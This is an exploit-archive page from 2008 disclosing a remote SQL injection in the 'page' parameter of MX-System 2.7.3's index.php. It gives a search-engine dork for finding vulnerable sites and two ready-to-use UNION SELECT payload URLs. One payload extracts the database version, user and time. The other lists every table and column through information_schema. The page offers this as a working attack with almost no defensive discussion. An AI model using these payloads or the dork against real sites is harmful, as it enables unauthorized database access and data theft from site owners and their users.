MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability
# Published : 2008-05-20
# Author : cOndemned
# Previous Title : ComicShout 2.5 (index.php comic_id) Remote SQL Injection Vulnerability
# Next Title : Php Jokesite 2.0 (cat_id) Remote SQL Injection Vulnerability

Name   : MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability
Author : cOndemned
Dork   : intext:Powered by MX-System 2.7.3
Greetz : ZaBeaTy, str0ke, doctor, Avantura </3

PoC :

    http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat_ws(char(58),version(),user(),now())/*
    http://[target]/[path]/index.php?page=-1+union+select+1,2,3,4,5,concat(table_name,char(58),column_name)+from+information_schema.columns/*
    
    SQL query will generate error page containing requested informations.

# www.Syue.com [2008-05-20]